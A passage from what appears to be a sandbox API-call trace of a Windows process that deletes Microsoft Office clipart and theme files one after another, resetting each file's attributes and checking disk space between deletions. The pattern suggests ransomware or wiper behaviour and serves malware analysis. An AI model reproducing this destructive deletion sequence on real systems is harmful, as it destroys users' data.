office\\clipart\\pub60cor\\ph02028k.jpg")) returned 1 [0068.952] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG", dwFileAttributes=0x80) returned 1 [0068.959] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02053j.jpg")) returned 1 [0068.961] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG", dwFileAttributes=0x80) returned 1 [0069.020] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02069j.jpg")) returned 1 [0069.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG", dwFileAttributes=0x80) returned 1 [0069.029] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02412k.jpg")) returned 1 [0069.032] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG", dwFileAttributes=0x80) returned 1 [0069.039] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02567j.jpg")) returned 1 [0069.043] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG", dwFileAttributes=0x80) returned 1 [0069.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02759j.jpg")) returned 1 [0069.054] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG", dwFileAttributes=0x80) returned 1 [0069.061] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02810j.jpg")) returned 1 [0069.063] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG", dwFileAttributes=0x80) returned 1 [0069.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02829j.jpg")) returned 1 [0069.078] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG", dwFileAttributes=0x80) returned 1 [0069.083] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02897j.jpg")) returned 1 [0069.087] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG", dwFileAttributes=0x80) returned 1 [0069.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03041i.jpg")) returned 1 [0069.096] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG", dwFileAttributes=0x80) returned 1 [0069.103] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03143i.jpg")) returned 1 [0069.106] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG", dwFileAttributes=0x80) returned 1 [0069.113] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03205i.jpg")) returned 1 [0069.116] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG", dwFileAttributes=0x80) returned 1 [0069.123] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03224i.jpg")) returned 1 [0069.128] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG", dwFileAttributes=0x80) returned 1 [0069.133] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03379i.jpg")) returned 1 [0069.135] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG", dwFileAttributes=0x80) returned 1 [0069.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03380i.jpg")) returned 1 [0069.143] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG", dwFileAttributes=0x80) returned 1 [0069.159] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03425i.jpg")) returned 1 [0069.176] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.176] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.176] CoTaskMemFree (pv=0x506980) [0069.177] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.177] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.177] CoTaskMemFree (pv=0x506980) [0069.181] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.181] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.182] CoTaskMemFree (pv=0x506980) [0069.188] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.188] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.188] CoTaskMemFree (pv=0x506980) [0069.195] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml", dwFileAttributes=0x80) returned 1 [0069.199] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\adjacency.xml")) returned 1 [0069.201] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml", dwFileAttributes=0x80) returned 1 [0069.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\angles.xml")) returned 1 [0069.209] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml", dwFileAttributes=0x80) returned 1 [0069.213] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apex.xml")) returned 1 [0069.217] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml", dwFileAttributes=0x80) returned 1 [0069.221] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apothecary.xml")) returned 1 [0069.224] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml", dwFileAttributes=0x80) returned 1 [0069.230] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\aspect.xml")) returned 1 [0069.232] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml", dwFileAttributes=0x80) returned 1 [0069.237] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\austin.xml")) returned 1 [0069.239] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml", dwFileAttributes=0x80) returned 1 [0069.243] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\black tie.xml")) returned 1 [0069.246] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml", dwFileAttributes=0x80) returned 1 [0069.250] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\civic.xml")) returned 1 [0069.253] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml", dwFileAttributes=0x80) returned 1 [0069.259] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\clarity.xml")) returned 1 [0069.262] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml", dwFileAttributes=0x80) returned 1 [0069.267] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\composite.xml")) returned 1 [0069.269] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml", dwFileAttributes=0x80) returned 1 [0069.273] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\concourse.xml")) returned 1 [0069.276] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.280] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml", dwFileAttributes=0x80) returned 1 [0069.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\couture.xml")) returned 1 [0069.283] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml", dwFileAttributes=0x80) returned 1 [0069.287] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\elemental.xml")) returned 1 [0069.290] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml", dwFileAttributes=0x80) returned 1 [0069.294] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\equity.xml")) returned 1 [0069.296] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.301] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml", dwFileAttributes=0x80) returned 1 [0069.302] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\essential.xml")) returned 1 [0069.304] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml", dwFileAttributes=0x80) returned 1 [0069.309] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\executive.xml")) returned 1 [0069.311] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml", dwFileAttributes=0x80) returned 1 [0069.316] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\flow.xml")) returned 1 [0069.318] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml", dwFileAttributes=0x80) returned 1 [0069.324] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\foundry.xml")) returned 1 [0069.327] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml", dwFileAttributes=0x80) returned 1 [0069.332] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grayscale.xml")) returned 1 [0069.334] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.340] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml", dwFileAttributes=0x80) returned 1 [0069.341] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grid.xml")) returned 1 [0069.343] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.347] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml", dwFileAttributes=0x80) returned 1 [0069.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\hardcover.xml")) returned 1 [0069.350] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml", dwFileAttributes=0x80) returned 1 [0069.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\horizon.xml")) returned 1 [0069.357] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.361] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml", dwFileAttributes=0x80) returned 1 [0069.361] 